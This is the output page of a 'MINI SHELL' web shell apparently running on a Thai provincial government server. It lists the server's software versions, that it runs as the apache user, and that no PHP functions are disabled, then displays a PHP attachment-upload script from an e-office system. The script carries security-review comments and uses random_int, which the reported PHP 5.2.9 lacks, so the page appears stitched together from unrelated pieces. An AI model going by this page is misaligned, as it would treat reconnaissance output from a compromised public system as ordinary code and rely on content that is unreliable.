MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/application/bin/agenda_v1/fileupload/


 

Current File : /var/www/html/pathumthani_eoffice/application/bin/agenda_v1/fileupload/doajaxfileupload.php
<?php
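header ("Content-Type: text/html; charset=tis-620");  
include("../../../config/config.inc.php");

// Attachment endpoint for the agenda module: adds, replaces or deletes one
// attachment record (selected by Fstatus = ADD / EDIT / DEL) and then prints
// the list of attachments for `idindex` as a JavaScript object literal.
//
// Security review of the previous revision of this script:
//   * every request value was interpolated straight into SQL text;
//   * the stored file kept the extension taken from the client's file name,
//     so the type of the file written under the web root was client-chosen;
//   * the upload was read from $fileToUpload, which only exists with
//     register_globals on, and a DB row was inserted even when copy() failed;
//   * old files were unlinked by bare file name (relative to this directory)
//     although they are stored under $folder_file, so they were never removed;
//   * DB values were echoed unescaped into a text/html response.
//
// NOTE(review): no session or authorization check is visible in this file —
// confirm that config.inc.php enforces one before this code runs.
// NOTE(review): the mysql_* extension is removed in PHP 7; when the shared
// connection code is migrated, replace the escaping below with mysqli/PDO
// prepared statements.

$error = "";
$msg = "";
$folder_file = "../attach_file/";

// Extensions accepted for attachments. Anything else is rejected so that no
// server-interpreted file type can be stored. Adjust to the document types the
// application really needs; the upload directory should additionally be
// configured so the web server never executes scripts from it.
$allowed_ext = array('pdf', 'doc', 'docx', 'xls', 'xlsx', 'ppt', 'pptx', 'txt', 'jpg', 'jpeg', 'png', 'gif');

// Escapes for values placed inside the single-quoted JS strings of the reply.
// "<" is escaped as well because the reply is served as text/html.
// json_encode() is not used: it requires UTF-8 and this data is TIS-620.
$js_escape = array("\\" => "\\\\", "'" => "\\'", "\r" => "\\r", "\n" => "\\n", "<" => "\\x3C");

$has_upload = isset($_FILES['fileToUpload'])
	&& is_string($_FILES['fileToUpload']['name'])
	&& $_FILES['fileToUpload']['name'] != "";
$file_name = $has_upload ? $_FILES['fileToUpload']['name'] : "";
$idindex = (isset($_REQUEST['idindex'])) ? $_REQUEST['idindex'] : "";
$Fstatus = (isset($_REQUEST['Fstatus'])) ? $_REQUEST['Fstatus'] : "";
$desc = (isset($_REQUEST['desc'])) ? $_REQUEST['desc'] : "";
$chkedit = (isset($_REQUEST['chkedit'])) ? $_REQUEST['chkedit'] : "";

// Escaped copies for use inside quoted SQL literals. This relies on the
// connection that the mysql_db_query() calls below already depend on
// (presumably opened by config.inc.php — confirm).
$idindex_sql = mysql_real_escape_string((string) $idindex);
$desc_sql = mysql_real_escape_string((string) $desc);
$chkedit_sql = mysql_real_escape_string((string) $chkedit);

// Validate and store the upload first. $tempname stays empty unless a file was
// accepted and written, so the cases below can never record a missing file.
$tempname = "";
if ($has_upload && ($Fstatus == "ADD" || $Fstatus == "EDIT")) {
	$upload = $_FILES['fileToUpload'];
	// Only the final extension is considered and the client's base name is
	// discarded; the stored name is random plus an allowlisted extension.
	$ext = strtolower(pathinfo($upload['name'], PATHINFO_EXTENSION));
	if ($upload['error'] !== UPLOAD_ERR_OK) {
		$error = "Upload failed (code " . (int) $upload['error'] . ")";
	} elseif (!in_array($ext, $allowed_ext, true)) {
		$error = "File type not allowed";
	} else {
		$candidate = GetRandomString(10) . "." . $ext;
		// move_uploaded_file() refuses paths that are not genuine PHP uploads.
		if (move_uploaded_file($upload['tmp_name'], $folder_file . $candidate)) {
			$tempname = $candidate;
		} else {
			$error = "Could not store uploaded file";
		}
	}
}

switch ($Fstatus) {
	case "ADD":
		if ($tempname != "") {
			$strSQL = "INSERT INTO tbl_attach_file(id_attach_file,attach_file,comment,status_file)VALUES('$idindex_sql','$tempname','$desc_sql','Y')";
			$Query = mysql_db_query($dbname, $strSQL);
		}
		break;

	case "EDIT":
		if ($has_upload) {
			// A rejected or failed upload leaves the existing record untouched;
			// the reason is reported through $error.
			if ($tempname != "") {
				$strSQL = "select *  FROM  tbl_attach_file   WHERE  run_id='$chkedit_sql'";
				$Query = mysql_db_query($dbname, $strSQL);
				while ($Query && ($row = mysql_fetch_array($Query))) {
					// basename() keeps the removal inside the attachment folder
					// whatever the stored value contains.
					$old_file = $folder_file . basename($row['attach_file']);
					if (is_file($old_file)) {
						unlink($old_file);
					}
				}
				$strSQL = "UPDATE  tbl_attach_file SET  attach_file='$tempname',comment='$desc_sql'  WHERE  run_id='$chkedit_sql'";
				$Query = mysql_db_query($dbname, $strSQL);
			}
		} else {
			$strSQL = "UPDATE  tbl_attach_file SET comment='$desc_sql'  WHERE  run_id='$chkedit_sql'";
			$Query = mysql_db_query($dbname, $strSQL);
		}
		break;

	case "DEL":
		if ($chkedit != "") {
			$strSQL = "select *  FROM  tbl_attach_file   WHERE  run_id='$chkedit_sql'";
			$Query = mysql_db_query($dbname, $strSQL);
			while ($Query && ($row = mysql_fetch_array($Query))) {
				$old_file = $folder_file . basename($row['attach_file']);
				if (is_file($old_file)) {
					unlink($old_file);
				}
			}
			$strSQL = "DELETE FROM  tbl_attach_file   WHERE  run_id='$chkedit_sql'";
			$Query = mysql_db_query($dbname, $strSQL);
		}
		break;
}

// Reply: the current attachment list for this idindex, in the same
// object-literal layout the client already consumes.
$strSQLSelect = "select *  FROM  tbl_attach_file   WHERE  id_attach_file='$idindex_sql'";
$Query = mysql_db_query($dbname, $strSQLSelect);
$items = array();
while ($Query && ($row = mysql_fetch_array($Query))) {
	$items[] = "{ "
		. "id:'" . strtr((string) $row['run_id'], $js_escape)
		. "',desc:'" . strtr((string) $row['comment'], $js_escape)
		. "',filename:'" . strtr((string) $row['attach_file'], $js_escape) . "'"
		. " }";
}
$strre = (count($items) > 0) ? " [  " . implode(",", $items) . "  ] " : "''";

echo "{";
echo "error: '" . strtr($error, $js_escape) . "',\n";
echo "msg:" . $strre . "";
echo "}";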
	
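/**
 * Build a random string of lowercase letters and digits.
 *
 * The previous loop ran while $a <= $length and therefore returned one
 * character more than requested; it now returns exactly $length characters.
 *
 * The result is used as the stored name of uploaded files, so it should not be
 * guessable: random_int() (a CSPRNG) is used when the runtime provides it, and
 * mt_rand() remains only as the fallback for older PHP versions.
 *
 * @param int $length number of characters wanted (cast to int; values <= 0 give "")
 * @return string random string over [0-9a-z]
 */
function GetRandomString($length){
	$template = "1234567890abcdefghijklmnopqrstuvwxyz";
	$length = (int) $length;
	$max_index = strlen($template) - 1;
	$use_csprng = function_exists('random_int');
	$rndstring = "";
	for ($a = 0; $a < $length; $a++) {
		$b = $use_csprng ? random_int(0, $max_index) : mt_rand(0, $max_index);
		$rndstring .= $template[$b];
	}
	return $rndstring;
}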
?>
